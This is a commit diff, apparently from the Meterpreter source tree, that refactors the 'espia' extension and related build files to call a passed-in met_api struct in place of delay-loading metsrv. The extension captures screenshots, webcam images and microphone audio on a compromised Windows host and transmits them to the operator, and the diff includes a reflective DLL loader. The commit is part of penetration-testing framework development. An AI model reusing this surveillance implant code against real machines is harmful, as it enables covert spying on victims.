Make espia work without delay loading metsrv

2025-03-24 18:16:24 +01:00 · 2020-04-17 18:10:09 +10:00 · 2020-04-17 18:10:09 +10:00 · cd18f98caf
commit cd18f98caf
parent 4ffe127f04
6 changed files with 44 additions and 43 deletions
--- a/c/meterpreter/source/extensions/espia/audio.c
+++ b/c/meterpreter/source/extensions/espia/audio.c
@ -1,5 +1,5 @@
 #define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
 #include <stdio.h>
 #include <windows.h>
 #include <tchar.h>
@ -7,6 +7,7 @@
 #include <stdlib.h>
 #include <malloc.h>
 #include "espia.h"
+#include "common_metapi.h"

 #pragma comment(lib, "vfw32.lib")
 #pragma comment(lib, "winmm.lib")
@ -60,6 +61,7 @@ BOOL capmicaudio(char* szFile, int millisecs)
    return (0L);
 }

+// TODO: remove this junk?
 int __declspec(dllexport) controlmic(char **waveresults, int msecs) {
 	DWORD dwError = 0;
 	char *wavestring = NULL;
@ -80,24 +82,24 @@ int __declspec(dllexport) controlmic(char **waveresults, int msecs) {
 /*
 * Grabs the audio from mic.
 */
-DWORD request_audio_get_dev_audio(Remote *remote, Packet *packet)
+DWORD request_audio_get_dev_audio(Remote* remote, Packet* packet)
 {
-	Packet *response = packet_create_response(packet);
-	DWORD res = ERROR_SUCCESS;
-	char *wave = NULL;
+    Packet* response = met_api->packet.create_response(packet);
+    DWORD res = ERROR_SUCCESS;
+    char* wave = NULL;

-	if (controlmic(&wave,packet_get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME)))
-	{
-		res = GetLastError();
-	}
+    if (controlmic(&wave, met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME)))
+    {
+        res = GetLastError();
+    }

-	//packet_add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave);
+    //met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave);


-	packet_transmit_response(res, remote, response);
+    met_api->packet.transmit_response(res, remote, response);

-	if (wave)
-	free(wave);
+    if (wave)
+        free(wave);

-	return res;
+    return res;
 }
--- a/c/meterpreter/source/extensions/espia/espia.c
+++ b/c/meterpreter/source/extensions/espia/espia.c
@ -2,23 +2,21 @@
 * This module implemenet webcam frae capture and mic recording features. 
 */
 #define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
+#include "common_metapi.h"
 #include "espia.h"
 #include "audio.h"
 #include "video.h"
 #include "screen.h"

-#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
+// Required so that use of the API works.
+MetApi* met_api = NULL;
+
 // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
 // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
 // second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
 #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"

-// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
-
-// this sets the delay load hook function, see DelayLoadMetSrv.h
-EnableDelayLoadMetSrv();
-
 Command customCommands[] =
 {
 	COMMAND_REQ( "espia_video_get_dev_image", request_video_get_dev_image ),
@ -32,11 +30,11 @@ Command customCommands[] =
 * @param remote Pointer to the remote instance.
 * @return Indication of success or failure.
 */
-DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
 {
-	hMetSrv = remote->met_srv;
+    met_api = api;

-	command_register_all( customCommands );
+	met_api->command.register_all( customCommands );

 	return ERROR_SUCCESS;
 }
@ -48,7 +46,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
 */
 DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 {
-	command_deregister_all( customCommands );
+	met_api->command.deregister_all( customCommands );

 	return ERROR_SUCCESS;
 }
--- a/c/meterpreter/source/extensions/espia/screen.c
+++ b/c/meterpreter/source/extensions/espia/screen.c
@ -1,5 +1,5 @@
 #define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
+#include "common.h"
 #include <stdio.h>
 #include <windows.h>
 #include <tchar.h>
@ -9,6 +9,7 @@
 #include <wingdi.h>
 #include "espia.h"
 #include "screen.h"
+#include "common_metapi.h"


 /* Function modified to store bitmap in memory. et [ ] metasploit.com 
@ -827,7 +828,6 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
 	memcpy(buf+sizeof(BITMAPFILEHEADER),(LPVOID) pbih, sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD));
 	memcpy(buf+sizeof(BITMAPFILEHEADER)+ (sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD)),(LPSTR) hp, (int) cb);
 	// Don't send it yet. Convert it to a JPEG.
-	//packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf, s);
    

 	// JPEG conversion start here..'
@ -875,7 +875,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
 	(*src_mgr->finish_input) (&cinfo, src_mgr);
 	jpeg_finish_compress(&cinfo);
 	jpeg_destroy_compress(&cinfo);
-	packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size);
+	met_api->packet.add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size);
 	// Is it safe to free this right after pack_add_tlv_raw? 
 	free(buf_jpeg);

@ -896,7 +896,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){
 */
 DWORD request_image_get_dev_screen(Remote *remote, Packet *packet)
 {
-	Packet *response = packet_create_response(packet);
+	Packet *response = met_api->packet.create_response(packet);
 	DWORD dwResult             = ERROR_ACCESS_DENIED;
 	HWINSTA hWindowStation     = NULL;
 	HWINSTA hOrigWindowStation = NULL;
@ -1045,7 +1045,7 @@ DWORD request_image_get_dev_screen(Remote *remote, Packet *packet)
 	if (hInputDesktop)
 		CloseDesktop(hInputDesktop);

-	packet_transmit_response(dwResult, remote, response);
+	met_api->packet.transmit_response(dwResult, remote, response);

 	return dwResult;
 }
--- a/c/meterpreter/source/extensions/espia/video.c
+++ b/c/meterpreter/source/extensions/espia/video.c
@ -1,4 +1,4 @@
-#include "../../common/common.h"
+#include "common.h"
 #include <stdio.h>
 #include <windows.h>
 #include <psapi.h>
@ -9,6 +9,7 @@
 #include <malloc.h>
 #include <vfw.h>
 #include "espia.h"
+#include "common_metapi.h"

 #pragma comment(lib, "vfw32.lib")

@ -73,6 +74,7 @@ char *StringCombine(char *string1, char *string2) {
 	return string1;
 }

+// TODO: remove this junk?!
 int __declspec(dllexport) controlcam(char **imageresults) {
 	DWORD dwError = 0;
 	char *imagestring = NULL;
@ -104,11 +106,11 @@ int __declspec(dllexport) controlcam(char **imageresults) {
 /*
 * Grabs the Webcam Image.
 */
-DWORD request_video_get_dev_image(Remote *remote, Packet *packet)
+DWORD request_video_get_dev_image(Remote* remote, Packet* packet)
 {
-	Packet *response = packet_create_response(packet);
+	Packet* response = met_api->packet.create_response(packet);
 	DWORD res = ERROR_SUCCESS;
-	char *image = NULL;
+	char* image = NULL;

 	do
 	{
@ -118,14 +120,14 @@ DWORD request_video_get_dev_image(Remote *remote, Packet *packet)
 			break;
 		}

-		//packet_add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image);
+		//met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image);

 	} while (0);

-	packet_transmit_response(res, remote, response);
+	met_api->packet.transmit_response(res, remote, response);

 	if (image)
-	free(image);
+		free(image);

 	return res;
 }
--- a/c/meterpreter/source/extensions/priv/server/priv.c
+++ b/c/meterpreter/source/extensions/priv/server/priv.c
@ -2,8 +2,7 @@
 * @brief This module implements privilege escalation features.
 */
 #include "precomp.h"
-#include "common_metapi.h"
-
+#include "common_metapi.h" 
 // Required so that use of the API works.
 MetApi* met_api = NULL;

--- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
+++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj
@ -86,7 +86,7 @@
      <Optimization>MinSpace</Optimization>
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -138,7 +138,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
      <Optimization>MinSpace</Optimization>
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -193,7 +193,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
      <Optimization>MaxSpeed</Optimization>
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -245,7 +245,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
      <Optimization>MaxSpeed</Optimization>
      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
      <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <StringPooling>true</StringPooling>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>